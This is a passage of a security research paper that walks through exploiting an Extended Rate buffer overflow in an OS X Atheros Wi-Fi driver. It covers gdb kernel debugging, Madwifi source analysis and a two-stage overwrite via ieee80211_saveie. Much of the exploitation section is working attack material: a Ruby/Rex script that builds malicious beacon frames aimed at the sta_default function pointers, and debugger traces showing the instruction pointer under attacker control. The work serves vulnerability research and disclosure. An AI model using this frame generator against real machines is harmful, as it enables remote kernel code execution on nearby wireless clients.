TestBox:~ root# sysctl debug debug.bpf_bufsize: 4096 debug.bpf_maxbufsize: 524288 debug.bpf_maxdevices: 256 debug.iokit: 0 debug.net80211: 0 0 debug.athdriver: 0 0 TestBox:~ root# sysctl -w debug.net80211=0xffffffff debug.net80211: 0 0 -> 2147483647 2147483647 TestBox:~ root# TestBox:~ root# tail /var/log/system.log Aug 5 18:07:12 TestBox kernel[0]: [en:00:1c:10:0b:d0:a1] discard [en:00:13:46:a8:73:c4] discard received beacon from 00:1c:10:0b:d0:a1 rssi 33 Aug 5 18:07:12 TestBox kernel[0]: [en:00:1c:10:0b:d0:a1] discard [en:00:13:46:a8:73:c4] discard received beacon from 00:1c:10:0b:d0:a1 rssi 33 Aug 5 18:07:12 TestBox kernel[0]: [en:00:1c:10:0b:d0:a1] discard [en:00:13:46:a8:73:c4] discard received beacon from 00:1c:10:0b:d0:a1 rssi 32 Aug 5 18:07:12 TestBox kernel[0]: [en:00:1c:10:0b:d0:a1] discard [en:00:13:46:a8:73:c4] discard received beacon from 00:1c:10:0b:d0:a1 rssi 32 Aug 5 18:07:12 TestBox kernel[0]: [en:00:1c:10:0b:d0:a1] discard [en:00:13:46:a8:73:c4] discard received beacon from 00:1c:10:0b:d0:a1 rssi 31 Aug 5 18:07:12 TestBox kernel[0]: [en:00:1c:10:0b:d0:a1] discard [en:00:13:46:a8:73:c4] discard received beacon from 00:1c:10:0b:d0:a1 rssi 32 Aug 5 18:07:12 TestBox kernel[0]: [en:00:1c:10:0b:d0:a1] discard [en:00:13:46:a8:73:c4] discard received beacon from 00:1c:10:0b:d0:a1 rssi 32 Aug 5 18:07:12 TestBox kernel[0]: [en:00:1c:10:0b:d0:a1] discard [en:00:13:46:a8:73:c4] discard received beacon from 00:1c:10:0b:d0:a1 rssi 31 Aug 5 18:07:12 TestBox kernel[0]: [en:00:1c:10:0b:d0:a1] discard [en:00:13:46:a8:73:c4] discard received beacon from 00:1c:10:0b:d0:a1 rssi 31 TestBox:~ root# One can read what each bit does and how they can be set using the debug tools found in the tools directory of the Madwifi source tree. The open-source 80211debug.c file corresponds to Apple's debug.net80211 module and athdebug.c corresponds to debug.athdriver. An enum found at the top of each debug source file defines the bit mask and what functionality it enables. 
You can activate all debugging functionality by setting the bit field to 0xffffffff. However, when doing this, a problem arises due to the large amount of data written to the log file. The function that performs the logging, IOLog, cannot always keep up with the flood of messages and does not know or care if a write is unsuccessful. For this reason, targeting a specific function may give more information and help to ensure that it is not buried under a wave of data. For instance, the following command will only show debug messages that involve the scanning code where this vulnerability occurs. If one does not want to remember the bit fields, the Madwifi tools required only minor tweaks to work with OS X, and the source is in the accompanying tar ball with other examples for this paper.

The task of kernel debugging ultimately rests with gdb, which is not well-suited for the job. Those people who learned kernel hacking with SoftICE will be unhappy with gdb. It lacks basic debugger functionality such as the ability to search through memory. Tracepoints do not work, nor do hardware breakpoints. However, it makes up for the lack of built-in functionality with the ability to script and the ability to set commands to execute after a breakpoint is reached. Stringing a lot of these features together makes it possible to hack together tools that help to supplement missing features. A short list of helpful tricks discovered during the use of gdb is included in the following sections.

4.1) Ghetto Profiling

Although several texts reference the ability to enable profiling by rebuilding the xnu kernel under OS X, that never seemed to work correctly for the author. For this reason, the author kept a written list of interesting offsets and other profiling information. For example, when you break in sta_add, ECX contains a pointer to the packet that is about to be parsed. To use this as a ghetto profiler, the author would set a breakpoint at the beginning of sta_add.
Using gdb's commands feature, a conditional is used to make sure ECX is not NULL (here, greater than 0x100) and, if so, print the first 20 words it points to. The debugger is then told to continue.

(gdb) break sta_add
Breakpoint 1 at 0x8f2e35
(gdb) commands
Type your commands for when breakpoint 1 is hit, one per line.
End with a line saying just "end".
> if $ecx > 0x100
>x/20x $ecx
>end
>continue
>end

Every time this breakpoint is hit it will print the first 20 words pointed to by ECX and then continue. This is useful because when the machine does crash one can see the packet it was processing at the time. This is what it looks like when running.

Breakpoint 1, 0x008f2e35 in sta_add ()
2: x/i $eip 0x8f2e35 : sub esp,0x3c
0x1e34f000: 0x013a0050 0x04cb1600 0x110062a3 0xfeaffb50
0x1e34f010: 0xfb501100 0x2ef0feaf 0xf6773728 0x00000192
0x1e34f020: 0x04110064 0x68730700 0x656b6e69 0x8204016e
0x1e34f030: 0x03968b84 0x16dd0b01 0x01f25000 0x50000001
0x1e34f040: 0x000102f2 0x02f25000 0x50000001 0x060402f2

Breakpoint 1, 0x008f2e35 in sta_add ()
2: x/i $eip 0x8f2e35 : sub esp,0x3c
0x1e36a000: 0x00000080 0xffffffff 0x6161ffff 0x8710ec61
0x1e36a010: 0xec616161 0xc1c08710 0xc5962377 0xa185eaae
0x1e36a020: 0xa9b1ffff 0x55441300 0x30455362 0x34634972
0x1e36a030: 0x4530614a 0x6f557678 0x82080137 0x0c968b84
0x1e36a040: 0x03483018 0xf0320b01 0x41414141 0x41414141

The first packet is a probe response, which can be determined by keying off the 0x50 that starts the packet. The integer format should be read in reverse byte order such that 0x013a0050 is actually 0x50 0x00 0x3a 0x01. The next packet starts with 0x80 0x00 0x00 0x00, which is a beacon frame with a BSSID of 0x61 0x61 0x61 0xec 0x10 0x87. This represents a packet that was created by the packet generation script.

The ghetto profiling works great on less frequently invoked breakpoints. The more hits a breakpoint receives, the greater the load on the machine.
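Reversing the byte order of every word by eye gets tedious, so the conversion can be scripted. The Ruby sketch below takes the 20 words from the second dump above, restores wire order, and decodes the management header and the IE headers that follow it. The function names are hypothetical, and the 36-byte offset assumes a beacon or probe response with a 24-byte header and 12 bytes of fixed fields.

```ruby
# Words copied from the second x/20x dump above.
WORDS = %w[
  0x00000080 0xffffffff 0x6161ffff 0x8710ec61
  0xec616161 0xc1c08710 0xc5962377 0xa185eaae
  0xa9b1ffff 0x55441300 0x30455362 0x34634972
  0x4530614a 0x6f557678 0x82080137 0x0c968b84
  0x03483018 0xf0320b01 0x41414141 0x41414141
].map { |w| Integer(w) }

# gdb prints each 32-bit word in little-endian host order, so packing the
# words back as little-endian recovers the order the bytes had on the wire.
def words_to_bytes(words)
  words.pack('V*').bytes
end

def mac(bytes)
  bytes.map { |b| format('%02x', b) }.join(':')
end

# Decode the frame control byte and the three addresses.
def decode_mgmt_header(bytes)
  fc = bytes[0]
  { type: (fc >> 2) & 0x3, subtype: (fc >> 4) & 0xf,
    dest: mac(bytes[4, 6]), source: mac(bytes[10, 6]), bssid: mac(bytes[16, 6]) }
end

# List [id, length] for each IE header that starts inside the captured bytes.
def list_ies(bytes, offset = 36)
  ies = []
  while offset + 2 <= bytes.length
    id = bytes[offset]
    len = bytes[offset + 1]
    ies << [id, len]
    offset += 2 + len
  end
  ies
end

bytes = words_to_bytes(WORDS)
header = decode_mgmt_header(bytes)
puts format('type=%d subtype=%d bssid=%s', header[:type], header[:subtype], header[:bssid])
list_ies(bytes).each { |id, len| puts format('IE 0x%02x claims %d bytes', id, len) }
```

Run against this dump, the last IE header reported is id 0x32 with a claimed length of 240 bytes, which is the oversized Extended Rate element followed by the start of its 0x41 filler.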

4.2) kgmacros

When gdb is started, a file named ``kgmacros'' from the kernel debug kit should be sourced; it contains many useful debugging macros. Most of these macros do not seem to work on the Intel platform. In some cases, one may get an error message stating that the command does not work with this architecture. In other cases, a macro may just silently fail. Although some commands like paniclog are useful, other commands like showx86backtrace can actually destroy data needed for debugging.

4.3) Simplifying things

There is a lot to do to get gdb set up for live kernel debugging. One must download the correct kernel debug kit, create the correct symbols on the target machine, and move them to the debug machine. Following that, one must start gdb, import the symbols, generate an NMI on the target machine, and connect the debugger. These tasks should be automated as much as possible or one will be stuck typing the same commands repeatedly. On the target machine, the command to create the symbols for AirPortAtheros5424 is simple:

    kextload -A -s /tmp/symbols /System/Library/Extensions/IO80211Family.kext/Contents/PlugIns/AirPortAtheros5424.kext

This will create the required symbols in /tmp/symbols/, which can then be archived and transferred to the debugging machine. On the debugging machine a script will do most of the manual tasks and define a macro for connecting to the target machine. The contents of OS Xkernelsetup:

    file /Volumes/KernelDebugKit/mach_kernel
    set architecture i386
    source /Volumes/KernelDebugKit/kgmacros
    add-symbol-file /Users/dave/symbols/com.apple.driver.AirPortAtheros5424.sym
    add-symbol-file /Users/dave/symbols/com.apple.iokit.IOPCIFamily.sym
    add-symbol-file /Users/dave/symbols/com.apple.iokit.IO80211Family.sym
    add-symbol-file /Users/dave/symbols/com.apple.iokit.IONetworkingFamily.sym
    set disassembly-flavor intel
    define knock
    target remote-kdp
    attach $arg0
    end

This script is sourced instead of running all the normal startup activities.
The knock macro replaces having to type two commands every time one needs to connect to the target machine.

    (gdb) knock 192.168.1.20
    Connected.
    (gdb)

One thing to note about kernel debugging is that, although the author has not observed this happening often, the module one is auditing can load at a different address. When that happens, new symbols should be generated; otherwise nothing will match up correctly. In the author's experience, one can boot a machine 100 times and the module will be at the same address 99 times out of 100, and the one time it is not, a simple reboot should bring the module back to the expected address.

5) Analyzing Madwifi

The madwifi source code shows that most of the crashes occur while iterating over the scan cache stored in a variable known as scanstate. To add an entry to the scan cache, a function called sta_add parses management frames into a structure called sta_entry.

    struct sta_entry {
        struct ieee80211_scan_entry base;
        TAILQ_ENTRY(sta_entry) se_list;
        LIST_ENTRY(sta_entry) se_hash;
        u_int8_t se_fails;           /* failure to associate count */
        u_int8_t se_seen;            /* seen during current scan */
        u_int8_t se_notseen;         /* not seen in previous scan */
        u_int32_t se_avgrssi;        /* LPF rssi state */
        unsigned long se_lastupdate; /* time of last update */
        unsigned long se_lastfail;   /* time of last failure */
        unsigned long se_lastassoc;  /* time of last association */
        u_int se_scangen;            /* iterator scan gen# */
    };

The sta_add function is too long to print here but can be found in the net80211/ieee80211_scan_sta.c source file. In this function, an assignment is performed that sets the copy destination for all the beacon data to the base member of sta_entry.

    ise = &se->base;

The ieee80211_scan_entry structure is defined as follows. Note that the Extended Rate buffer is defined as an array with a size of IEEE80211_RATE_MAXSIZE + 2. This is much like other buffer overflows where programmers reserve fixed-size buffers in memory to hold variable-length data from packets.

    /*
     * Scan cache entry format used when exporting data from a policy
     * module; this data may be represented some other way internally.
     */
    struct ieee80211_scan_entry {
        u_int8_t se_macaddr[IEEE80211_ADDR_LEN];
        u_int8_t se_bssid[IEEE80211_ADDR_LEN];
        u_int8_t se_ssid[2 + IEEE80211_NWID_LEN];
        u_int8_t se_rates[2 + IEEE80211_RATE_MAXSIZE];
        u_int8_t se_xrates[2 + IEEE80211_RATE_MAXSIZE];
        u_int32_t se_rstamp;               /* recv timestamp */
        union {
            u_int8_t data[8];
            u_int64_t tsf;
        } se_tstamp;                       /* from last rcv'd beacon */
        u_int16_t se_intval;               /* beacon interval (host byte order) */
        u_int16_t se_capinfo;              /* capabilities (host byte order) */
        struct ieee80211_channel *se_chan; /* channel where sta found */
        u_int16_t se_timoff;               /* byte offset to TIM ie */
        u_int16_t se_fhdwell;              /* FH only (host byte order) */
        u_int8_t se_fhindex;               /* FH only */
        u_int8_t se_erp;                   /* ERP from beacon/probe resp */
        int8_t se_rssi;                    /* avg'd recv ssi */
        u_int8_t se_dtimperiod;            /* DTIM period */
        u_int8_t *se_wpa_ie;               /* captured WPA ie */
        u_int8_t *se_rsn_ie;               /* captured RSN ie */
        u_int8_t *se_wme_ie;               /* captured WME ie */
        u_int8_t *se_ath_ie;               /* captured Atheros ie */
        u_int se_age;                      /* age of entry (0 on create) */
    };

IEEE80211_RATE_MAXSIZE is defined in ieee80211.h as follows:

    #define IEEE80211_RATE_MAXSIZE 15 /* max rates we'll handle */

The author was initially puzzled: all research to this point showed that the Extended Rate buffer was the culprit, but the madwifi source code had a check for a maximum length before the copy happened. Either the corruption occurred before the sta_add function, or the length check did not work as expected. To figure out what might be missing, the author set a breakpoint at the beginning of sta_add and walked through the code. Single-stepping showed that the arguments for the memcpy were set up starting at 0x008f3188. This was verified by looking at the size and the source being passed to the memcpy.
Since the Extended Rate element in a script-generated packet is noticeably larger than in a typical packet, a conditional breakpoint can be set at the point where the size argument is placed on the stack for the memcpy. The following debugger output shows how the system behaves when this breakpoint is set:

    (gdb) break *0x008f3188 if $eax > 100
    Breakpoint 2 at 0x8f3188
    (gdb) c
    Continuing.

    Breakpoint 2, 0x008f3188 in sta_add ()
    2: x/i $eip 0x8f3188 : mov DWORD PTR [esp+8],eax
    (gdb) stepi
    0x008f318c in sta_add ()
    2: x/i $eip 0x8f318c : mov DWORD PTR [esp+4],edx
    (gdb)
    0x008f3190 in sta_add ()
    2: x/i $eip 0x8f3190 : lea eax,[esi+63]
    (gdb)
    0x008f3193 in sta_add ()
    2: x/i $eip 0x8f3193 : mov DWORD PTR [esp],eax
    (gdb)
    0x008f3196 in sta_add ()
    2: x/i $eip 0x8f3196 : call 0x1933c8
    (gdb) x/20x $esp
    0xc82badc: 0x03aeb643 0x1e36a046 0x000000f2 0x00000080
    0xc82baec: 0x0c82bb24 0x0c82bb04 0x0c82bc8c 0x03800004
    0xc82bafc: 0x0393d72c 0x0393d704 0x1e36a00a 0x0380246c
    0xc82bb0c: 0x008f2e35 0x00000014 0x00000302 0x0c82bc8c
    0xc82bb1c: 0x00000080 0x1e36a138 0x0c82bb84 0x008e8cb9
    (gdb) x/20x 0x1e36a046
    0x1e36a046: 0x4141f032 0x41414141 0x41414141 0x41414141
    0x1e36a056: 0x41414141 0x41414141 0x41414141 0x41414141
    0x1e36a066: 0x41414141 0x41414141 0x41414141 0x41414141
    0x1e36a076: 0x41414141 0x41414141 0x41414141 0x41414141
    0x1e36a086: 0x41414141 0x41414141 0x41414141 0x41414141
    (gdb)

To find the same memcpy call in a disassembly of the driver binary, its runtime address has to be converted to a relative address within the binary: 0x8f3196 - 0x8e7000 - 0x1000 = 0xB196. The code found at that location shows that, although there is a length check in the open source driver, it is not actually present in the OS X binary driver.
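
The two pieces of arithmetic behind this trace can be checked with a small Ruby sketch. It is an illustration, not the author's tooling. IEEE80211_ADDR_LEN = 6 and IEEE80211_NWID_LEN = 32 are assumed from the Madwifi headers (only IEEE80211_RATE_MAXSIZE is quoted in the text), the helper names are hypothetical, and the 0x1000 adjustment is simply the one used in the subtraction above.

```ruby
# Sizes taken from the Madwifi headers. Only IEEE80211_RATE_MAXSIZE is quoted
# in the text; the other two values are assumptions.
IEEE80211_ADDR_LEN     = 6
IEEE80211_NWID_LEN     = 32
IEEE80211_RATE_MAXSIZE = 15

# Leading byte-array members of struct ieee80211_scan_entry, in order.
LEADING_FIELDS = [
  [:se_macaddr, IEEE80211_ADDR_LEN],
  [:se_bssid,   IEEE80211_ADDR_LEN],
  [:se_ssid,    2 + IEEE80211_NWID_LEN],
  [:se_rates,   2 + IEEE80211_RATE_MAXSIZE],
  [:se_xrates,  2 + IEEE80211_RATE_MAXSIZE]
].freeze

# Running byte offset of each field (no padding occurs between u_int8_t arrays).
def field_offsets(fields)
  offset = 0
  fields.each_with_object({}) do |(name, size), table|
    table[name] = offset
    offset += size
  end
end

# Runtime address -> address inside the kext binary, as computed in the text.
def kext_relative(runtime_addr, load_base, adjustment = 0x1000)
  runtime_addr - load_base - adjustment
end

offsets   = field_offsets(LEADING_FIELDS)
copy_size = 0xf2                        # third memcpy argument on the stack
room      = 2 + IEEE80211_RATE_MAXSIZE  # bytes reserved for se_xrates

puts "se_xrates offset: #{offsets[:se_xrates]}"
puts "bytes written past se_xrates: #{copy_size - room}"
puts format('memcpy call inside the binary: 0x%X', kext_relative(0x8f3196, 0x8e7000))
```

Under these assumptions se_xrates sits 63 bytes into the entry, which matches the lea eax,[esi+63] that builds the destination argument, and a 0xf2-byte copy runs 225 bytes past the 17 bytes reserved for it. The disassembly that follows uses binary-relative addresses of the kind returned by kext_relative.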

    __text:0000B177 mov ecx, [ebp+scanparam]
    __text:0000B17A mov edx, [ecx+28h]
    __text:0000B17D test edx, edx
    __text:0000B17F jz short loc_B19D
    __text:0000B181 movzx eax, byte ptr [edx+1]
    __text:0000B185 add eax, 2
    __text:0000B188 mov [esp+48h+var_40], eax
    __text:0000B18C mov [esp+48h+var_44], edx
    __text:0000B190 lea eax, [esi+63]
    __text:0000B193 mov [esp+48h+ic], eax
    __text:0000B196 call near ptr _memcpy ; xrate memcpy

In this example, the copy size is 0xf2 and the ``Extended Rate'' buffer is being copied. With no length check in place, the copy corrupts the data that follows the Extended Rate buffer in the ieee80211_scan_entry, and can reach adjacent data such as another sta_entry structure. This is where the first of two serious problems manifests itself. It is possible to overwrite fields in a structure, but not the control structures, like stack or heap frames, that are typically used to gain code execution. This makes direct code execution more difficult.

6) Getting Code Execution

The result of this flaw is that many things beyond the Extended Rate buffer in the ieee80211_scan_entry structure are corrupted. In a traditional stack overflow, control of execution flow is obtained directly by overwriting an important value, such as the return address. The corruption caused by the ``Extended Rate'' bug is more complicated due to the apparent lack of adjacent control structures. The most promising avenue for getting execution can be found in a function named athcopyscanresults. This function uses the fields that are overwritten to copy memory. An attacker can control the size of the copy and the source of the copy. In addition to crashing reliably on the same data, the size of the memcpy is two bytes wide, meaning that up to 65535 bytes can be copied. Since the destination of the memcpy is a structure that ends with a function pointer, the hope is that enough data can be written outside of the destination buffer to the point where the function pointer is overwritten.
In this way, the next time the function pointer is called, the caller would instead jump to whatever address is now stored in the function pointer. In other words, this represents a two-stage overwrite. The first overwrite does not provide direct code execution, but it allows an attacker to create a second overwrite that will. The Beacon packet contains a number of buffers one can use for this second-stage overwrite. Thus, an overflow in one buffer in the packet (the Extended Rate IE) allows an attacker to control how a second buffer is copied (in this case, the Robust Security Network (RSN) IE). It is the copying of the second buffer that will permit code execution. Below are the registers and the stack trace of a call to the second memcpy that is being discussed.

    (gdb) bt
    #0 0x001933de in memcpy_common ()
    #1 0x038ce804 in ?? ()
    #2 0x008c6083 in sta_iterate ()
    #3 0x008e52b7 in AirPort_Athr5424::ieee80211_notify_scan_done ()
    #4 0x008e55b9 in AirPort_Athr5424::setSCAN_REQ ()
    (gdb) info registers
    eax 0xaca0000 181010432
    ecx 0xc98 3224
    edx 0x3263 12899
    ebx 0x8 8
    esp 0xc71b714 0xc71b714
    ebp 0xc71b758 0xc71b758
    esi 0x41316341 1093755713
    edi 0xaca0000 181010432
    eip 0x1933de 0x1933de
    eflags 0x10203 66051
    cs 0x8 8
    ss 0x10 16
    ds 0x120010 1179664
    es 0xc710010 208732176
    fs 0x10 16
    gs 0x900048 9437256
    (gdb)

EDX contains the size of the copy before it is loaded into ECX. In the packet, the bytes in sequence were 0x41 0x63 0x31 0x41 0x63 0x32, meaning that the source address (what is found in ESI, 0x41316341) and the copy size (0x3263) are adjacent to one another. The bytes that overwrote these fields were also always located 0x41 bytes from the start of the ``Extended Rate'' field in the Beacon packet. Although this seems like an interesting plan, a call to IOMalloc right before the memcpy makes sure the destination buffer has enough space for the copy. So although a copy of up to 0xffff bytes is possible, it does not actually write outside of any bounds.
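
The register values above can be traced back to the padding pattern with a few lines of Ruby. This is a hedged sketch: cyclic_pattern is a stand-in written for this example that imitates the Aa0Aa1Aa2... sequence of Metasploit's pattern generator, and the indices 63 and 67 are inferred from the text (0x41 bytes into the IE, minus its two-byte header) rather than read out of the driver.

```ruby
# Stand-in for Metasploit's pattern generator: Aa0Aa1Aa2 ... Ab0Ab1 ...
def cyclic_pattern(length)
  out = +''
  ('A'..'Z').each do |upper|
    ('a'..'z').each do |lower|
      ('0'..'9').each do |digit|
        return out[0, length] if out.length >= length
        out << upper << lower << digit
      end
    end
  end
  out[0, length]
end

# Inferred positions inside the 240-byte Extended Rate payload (assumptions):
# the source pointer sits 0x41 bytes into the IE, which has a 2-byte header.
SRC_INDEX  = 0x41 - 2     # 63
SIZE_INDEX = SRC_INDEX + 4

pattern    = cyclic_pattern(240)
source_ptr = pattern[SRC_INDEX, 4].unpack1('V')   # 32-bit little-endian
copy_size  = pattern[SIZE_INDEX, 2].unpack1('v')  # 16-bit little-endian

puts format('source pointer (ESI): 0x%08x', source_ptr)
puts format('copy size (EDX):      0x%04x', copy_size)
```

With these indices the sketch reproduces ESI = 0x41316341 and EDX = 0x3263 from the register dump. Index 67 is also the first location that the exploit script blanks with zero bytes, which is consistent with it holding the copy size.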

The disassembly for the memcpy call in athcopyscanresults is shown below:

    __text:000260AA call near ptr _IOMalloc
    __text:000260AF mov edx, eax
    __text:000260B1 mov ecx, [ebp+var_1C]
    __text:000260B4 mov [ecx+88h], eax
    __text:000260BA test eax, eax
    __text:000260BC jz loc_262C8
    __text:000260C2 movzx eax, word ptr [esi+84h]
    __text:000260C9 mov [esp+38h+var_30], eax
    __text:000260CD mov eax, [esi+80h]
    __text:000260D3 mov [esp+38h+var_34], eax
    __text:000260D7 mov [esp+38h+var_38], edx
    __text:000260DA call near ptr _memcpy

The author could go on for hours about what other methods also did not work, but what does work seems more interesting. Luckily, almost immediately after the corruption of memory, the driver calls a function named ieee80211_saveie four times. The purpose of these calls is to save other Information Elements (such as RSN, WME, and WPA) from the Beacon frame into the sta_entry structure. The source code from the Madwifi version of ieee80211_saveie:

    void
    ieee80211_saveie(u_int8_t **iep, const u_int8_t *ie)
    {
        u_int ielen = ie[1] + 2;
        /*
         * Record information element for later use.
         */
        if (*iep == NULL || (*iep)[1] != ie[1]) {
            if (*iep != NULL)
                FREE(*iep, M_DEVBUF);
            MALLOC(*iep, void*, ielen, M_DEVBUF, M_NOWAIT);
        }
        if (*iep != NULL)
            memcpy(*iep, ie, ielen);
    }

In short, a pointer to a pointer is passed as the address to copy data to. There is some sanity checking to see if the destination address is NULL or if the size of the buffer already stored at the destination address differs from the one just passed in. If either of these conditions is true, a new buffer is allocated and the memcpy works just fine. Since an attacker can control every element in the structure that is passed in as the place to save the buffer to, the check that decides whether an allocation is performed can be bypassed, and the buffer can be copied anywhere in memory the attacker chooses. This is pretty simple.
All that is needed is for the byte stored at the destination address plus 1 to equal the length of the IE that is being saved. Although there are countless possibilities for what to overwrite, the target buffer needs to meet a few basic requirements. Preferably, an attacker will overwrite a function pointer. Since it seems that the driver loads at the same address every time, overwriting something that is at a fixed offset inside the driver is preferable. This minimizes the amount of damage done outside the driver, because one will want the machine to keep running long enough to execute a payload. There is a structure called sta_default. This structure keeps function pointers needed to carry out certain elements of driver operations and, luckily, it appears to be recreated quite often, so that any damage done to it could automatically repair itself. Here is the structure from the Madwifi source code:

    static const struct ieee80211_scanner sta_default = {
        .scan_name = "default",
        .scan_attach = sta_attach,
        .scan_detach = sta_detach,
        .scan_start = sta_start,
        .scan_restart = sta_restart,
        .scan_cancel = sta_cancel,
        .scan_end = sta_pick_bss,
        .scan_flush = sta_flush,
        .scan_add = sta_add,
        .scan_age = sta_age,
        .scan_iterate = sta_iterate,
        .scan_assoc_fail = sta_assoc_fail,
        .scan_assoc_success = sta_assoc_success,
        .scan_default = ieee80211_sta_join,
    };

During actual live debugging its contents can be seen as:

    (gdb) x/20x sta_default
    0x931ee0 : 0x0092e050 0x008f1543 0x008f16c6 0x008f18c7
    0x931ef0 : 0x008f19b5 0x008f19cc 0x008f2b7d 0x008f1694
    0x931f00 : 0x008f2e2f 0x008f261e 0x008f20bb 0x008f2188
    0x931f10 : 0x008f1fd5 0x00000000 0x00000000 0x00000000
    0x931f20 : 0x000000a0 0x00000140 0x000000a0 0x000000c0
    (gdb)

As an initial test, the author overwrote every function pointer in the structure with a pattern such as 0x61413761 (aA7a in ASCII, or a7Aa in memory byte order, which comes from the typical Metasploit buffer padding pattern).
A crash dump with an error message about failing to execute code at a bad address like 0x61413761 proves that remote code execution is theoretically possible. To help better understand this, it is helpful to single-step through the sta_add function after sending an Extended Rate IE that is larger than 100 bytes. It is also helpful to follow execution into the call that saves the RSN IE buffer from the packet. Finally, it is useful to single-step through ieee80211_saveie until the size comparison is hit. The kernel should crash the next time any of the overwritten function pointers are called. The code used to generate the packet during this single step is shown below:

    ssid = Rex::Text.rand_text_alphanumeric(rand(255))
    bssid = "\x61\x61\x61" + Rex::Text.rand_text(3)
    seq = [rand(255)].pack('n')
    xrate = make_xrate()
    rsn = make_rsn()

    frame =
      "\x80" +                      # type/subtype: beacon
      "\x00" +                      # flags
      "\x00\x00" +                  # duration
      "\xff\xff\xff\xff\xff\xff" +  # destination (broadcast)
      bssid +                       # source
      bssid +                       # BSSID
      seq +                         # sequence control
      Rex::Text.rand_text(8) +      # timestamp
      "\xff\xff" +                  # beacon interval
      Rex::Text.rand_text(2) +      # capability flags
      #ssid tag
      "\x00" + ssid.length.chr + ssid +
      #supported rates
      "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" +
      #current channel
      "\x03" + "\x01" + channel.chr +
      #Xrate
      xrate +
      #RSN
      rsn

    def make_xrate
      #calculate the offset that RSN needs to overwrite
      staRsnOff = 0x4aee0
      kextAddr = datastore['KEXT_OFF'].to_i
      staStruct = kextAddr + staRsnOff

      #build the xrate_frame
      xrate_build = Rex::Text.pattern_create(240) #base of IE

      #crashes often occur in the following locations so they are blanked
      xrate_build[67, 2]="\x00\x00"
      xrate_build[71, 4]="\x00\x00\x00\x00"
      xrate_build[79, 4]="\x00\x00\x00\x00"

      #Overwrite address for RSN element
      xrate_build[55, 4]=[staStruct].pack('V')

      xrate_frame = "\x32" + xrate_build.length.chr + xrate_build
      return xrate_frame
    end

    def make_rsn
      #the IE length must be 0xe0 (224) to match the byte stored at sta_default+1
      rsn_data = Rex::Text.pattern_create(224)
      rsn_frame = "\x30" + rsn_data.length.chr + rsn_data
      return rsn_frame
    end

And the associated single-step through the functions:

    Breakpoint 4, 0x008f3188 in sta_add ()
    2: x/i $eip 0x8f3188 : mov DWORD PTR [esp+8],eax
    (gdb) advance *0x8f32fe
    0x008f32fe in sta_add ()
    2: x/i $eip 0x8f32fe : call 0x8f521b
    (gdb) stepi
    0x008f521b in ieee80211_saveie ()
    2: x/i $eip 0x8f521b : push ebp
    (gdb)
    0x008f521c in ieee80211_saveie ()
    2: x/i $eip 0x8f521c : mov ebp,esp
    (gdb)
    0x008f521e in ieee80211_saveie ()
    2: x/i $eip 0x8f521e : push edi
    (gdb)
    0x008f521f in ieee80211_saveie ()
    2: x/i $eip 0x8f521f : push esi
    (gdb)
    0x008f5220 in ieee80211_saveie ()
    2: x/i $eip 0x8f5220 : push ebx
    (gdb)
    0x008f5221 in ieee80211_saveie ()
    2: x/i $eip 0x8f5221 : sub esp,0x2c
    (gdb)
    0x008f5224 in ieee80211_saveie ()
    2: x/i $eip 0x8f5224 : mov edi,DWORD PTR [ebp+8]
    (gdb)
    0x008f5227 in ieee80211_saveie ()
    2: x/i $eip 0x8f5227 : mov eax,DWORD PTR [ebp+12]
    (gdb)
    0x008f522a in ieee80211_saveie ()
    2: x/i $eip 0x8f522a : movzx edx,BYTE PTR [eax+1]
    (gdb)
    0x008f522e in ieee80211_saveie ()
    2: x/i $eip 0x8f522e : movzx ebx,dl
    (gdb) info registers
    eax 0x1e3ae130 507175216
    ecx 0xc8cbc8c 210549900
    edx 0xe0 224
    ebx 0x388f004 59305988
    esp 0xc8cba9c 0xc8cba9c
    ebp 0xc8cbad4 0xc8cbad4
    esi 0x388f004 59305988
    edi 0x388f07c 59306108
    eip 0x8f522e 0x8f522e
    eflags 0x216 534
    cs 0x8 8
    ss 0x10 16
    ds 0x10 16
    es 0x190010 1638416
    fs 0xc8c0010 210501648
    gs 0x48 72
    (gdb) stepi
    0x008f5231 in ieee80211_saveie ()
    2: x/i $eip 0x8f5231 : lea eax,[ebx+2]
    (gdb)
    0x008f5234 in ieee80211_saveie ()
    2: x/i $eip 0x8f5234 : mov DWORD PTR [ebp-28],eax
    (gdb)
    0x008f5237 in ieee80211_saveie ()
    2: x/i $eip 0x8f5237 : mov eax,DWORD PTR [edi]
    (gdb)
    0x008f5239 in ieee80211_saveie ()
    2: x/i $eip 0x8f5239 : test eax,eax
    (gdb)
    0x008f523b in ieee80211_saveie ()
    2: x/i $eip 0x8f523b : je 0x8f5254
    (gdb)
    0x008f523d in ieee80211_saveie ()
    2: x/i $eip 0x8f523d : cmp dl,BYTE PTR [eax+1]
    (gdb) info registers
    eax 0x931ee0 9641696
    ecx 0xc8cbc8c 210549900
    edx 0xe0 224
    ebx 0xe0 224
    esp 0xc8cba9c 0xc8cba9c
    ebp 0xc8cbad4 0xc8cbad4
    esi 0x388f004 59305988
    edi 0x388f07c 59306108
    eip 0x8f523d 0x8f523d
    eflags 0x202 514
    cs 0x8 8
    ss 0x10 16
    ds 0x10 16
    es 0x190010 1638416
    fs 0xc8c0010 210501648
    gs 0x48 72
    (gdb) x/20x $eax
    0x931ee0 : 0x0092e050 0x008f1543 0x008f16c6 0x008f18c7
    0x931ef0 : 0x008f19b5 0x008f19cc 0x008f2b7d 0x008f1694
    0x931f00 : 0x008f2e2f 0x008f261e 0x008f20bb 0x008f2188
    0x931f10 : 0x008f1fd5 0x00000000 0x00000000 0x00000000
    0x931f20 : 0x000000a0 0x00000140 0x000000a0 0x000000c0
    (gdb) c
    Continuing.

    Program received signal SIGTRAP, Trace/breakpoint trap.
    0x61413761 in ?? ()
    1: x/i $eip 0x61413761: Disabling display 1 to avoid infinite recursion.
    Cannot access memory at address 0x61413761
    (gdb) bt
    #0 0x61413761 in ?? ()
    #1 0x008e977c in scan_next ()
    Previous frame inner to this frame (corrupt stack?)
    (gdb)

